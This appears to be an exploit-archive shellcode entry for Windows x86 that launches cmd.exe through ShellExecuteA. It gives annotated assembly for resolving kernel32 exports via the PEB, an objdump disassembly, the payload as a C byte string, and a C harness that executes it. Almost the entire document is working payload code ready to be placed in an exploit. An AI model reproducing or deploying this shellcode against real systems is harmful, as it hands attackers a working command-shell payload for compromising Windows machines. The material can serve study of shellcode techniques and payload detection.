/* # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode # Date : 22-06-2016 # Author : Roziul Hasan Khan Shifat # Tested on : Windows 7,10 x86 */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;EAX=PEB mov eax,[eax+0xc] ;EAX=PEB->Ldr mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList lodsd ; EAX=ntdll.dll xchg eax,esi ;EAX=ESI , ESI=EAX lodsd ; EAX=Third(kernel32) mov ebx,[eax+0x10] ;PVOID Dllbase (base address) ;------------------------------- mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames xor ecx,ecx ;----------------------- Get_func: inc ecx ;increment the ordinal lodsd ;Get name offset add eax,ebx ;(offset+kernel32.dll base adress)=Get function name cmp dword [eax],0x50746547 ;GetP jnz Get_func cmp dword [eax+0x4],0x41636f72 ;rocA jnz Get_func cmp dword [eax+0x8],0x65726464 ;ddre jnz Get_func ;--------------------- mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll mov cx,[esi+ecx*2] ;CX=Number of Function dec ecx mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions add esi,ebx ;ESI=beginning of Address table mov edx,[esi+ecx*4];EDX=Pointer(offset) add edx,ebx ;Edx=GetProcAddress ;----------------------------- xor esi,esi mov esi,edx ;backup of GetProcAddress xor edi,edi mov edi,ebx ;-------------- ;finding address of LoadLibraryA() xor ecx,ecx push ecx push 0x41797261 push 0x7262694c push 0x64616f4c push esp push ebx ;address of kernel32.dll call edx add esp,12 ;----------------- xor ecx,ecx ;finding address of ExitProcess push 0x42737365 mov [esp+3],cl push 0x636f7250 push 0x74697845 push esp push edi xor edi,edi mov edi,eax call esi ;---------------------------- add esp,12 ;LoadLibraryA("shell32.dll") xor ecx,ecx push ecx push 0x416c6c64 mov [esp+3],cl push 0x2e32336c push 0x6c656873 push esp xor edx,edx mov edx,edi ;Edx=LoadLibraryA mov edi,eax ;edi=ExitProcess call edx add esp,11 ;------------------ ;finding address of ShellExecuteA() xor ecx,ecx push 0x42424241 mov [esp+1],cl push 0x65747563 push 0x6578456c push 0x6c656853 push esp push eax call esi ;------------------- ;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); add esp,13 xor ecx,ecx push 0x41657865 mov [esp+3],cl push 0x2e646d63 push esp pop ecx xor edx,edx inc edx push edx xor edx,edx push edx push edx push ecx push edx push edx call eax call edi */ /* Disassembly of section .text: 00401000 <_start>: 401000: 31 c9 xor %ecx,%ecx 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 401006: 8b 40 0c mov 0xc(%eax),%eax 401009: 8b 70 14 mov 0x14(%eax),%esi 40100c: ad lods %ds:(%esi),%eax 40100d: 96 xchg %eax,%esi 40100e: ad lods %ds:(%esi),%eax 40100f: 8b 58 10 mov 0x10(%eax),%ebx 401012: 8b 53 3c mov 0x3c(%ebx),%edx 401015: 01 da add %ebx,%edx 401017: 8b 52 78 mov 0x78(%edx),%edx 40101a: 01 da add %ebx,%edx 40101c: 8b 72 20 mov 0x20(%edx),%esi 40101f: 01 de add %ebx,%esi 401021: 31 c9 xor %ecx,%ecx 00401023 : 401023: 41 inc %ecx 401024: ad lods %ds:(%esi),%eax 401025: 01 d8 add %ebx,%eax 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 40102d: 75 f4 jne 401023 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 401036: 75 eb jne 401023 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 40103f: 75 e2 jne 401023 401041: 8b 72 24 mov 0x24(%edx),%esi 401044: 01 de add %ebx,%esi 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx 40104a: 49 dec %ecx 40104b: 8b 72 1c mov 0x1c(%edx),%esi 40104e: 01 de add %ebx,%esi 401050: 8b 14 8e mov (%esi,%ecx,4),%edx 401053: 01 da add %ebx,%edx 401055: 31 f6 xor %esi,%esi 401057: 89 d6 mov %edx,%esi 401059: 31 ff xor %edi,%edi 40105b: 89 df mov %ebx,%edi 40105d: 31 c9 xor %ecx,%ecx 40105f: 51 push %ecx 401060: 68 61 72 79 41 push $0x41797261 401065: 68 4c 69 62 72 push $0x7262694c 40106a: 68 4c 6f 61 64 push $0x64616f4c 40106f: 54 push %esp 401070: 53 push %ebx 401071: ff d2 call *%edx 401073: 83 c4 0c add $0xc,%esp 401076: 31 c9 xor %ecx,%ecx 401078: 68 65 73 73 42 push $0x42737365 40107d: 88 4c 24 03 mov %cl,0x3(%esp) 401081: 68 50 72 6f 63 push $0x636f7250 401086: 68 45 78 69 74 push $0x74697845 40108b: 54 push %esp 40108c: 57 push %edi 40108d: 31 ff xor %edi,%edi 40108f: 89 c7 mov %eax,%edi 401091: ff d6 call *%esi 401093: 83 c4 0c add $0xc,%esp 401096: 31 c9 xor %ecx,%ecx 401098: 51 push %ecx 401099: 68 64 6c 6c 41 push $0x416c6c64 40109e: 88 4c 24 03 mov %cl,0x3(%esp) 4010a2: 68 6c 33 32 2e push $0x2e32336c 4010a7: 68 73 68 65 6c push $0x6c656873 4010ac: 54 push %esp 4010ad: 31 d2 xor %edx,%edx 4010af: 89 fa mov %edi,%edx 4010b1: 89 c7 mov %eax,%edi 4010b3: ff d2 call *%edx 4010b5: 83 c4 0b add $0xb,%esp 4010b8: 31 c9 xor %ecx,%ecx 4010ba: 68 41 42 42 42 push $0x42424241 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) 4010c3: 68 63 75 74 65 push $0x65747563 4010c8: 68 6c 45 78 65 push $0x6578456c 4010cd: 68 53 68 65 6c push $0x6c656853 4010d2: 54 push %esp 4010d3: 50 push %eax 4010d4: ff d6 call *%esi 4010d6: 83 c4 0d add $0xd,%esp 4010d9: 31 c9 xor %ecx,%ecx 4010db: 68 65 78 65 41 push $0x41657865 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) 4010e4: 68 63 6d 64 2e push $0x2e646d63 4010e9: 54 push %esp 4010ea: 59 pop %ecx 4010eb: 31 d2 xor %edx,%edx 4010ed: 42 inc %edx 4010ee: 52 push %edx 4010ef: 31 d2 xor %edx,%edx 4010f1: 52 push %edx 4010f2: 52 push %edx 4010f3: 51 push %ecx 4010f4: 52 push %edx 4010f5: 52 push %edx 4010f6: ff d0 call *%eax 4010f8: ff d7 call *%edi */ #include #include char shellcode[]=\ "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); }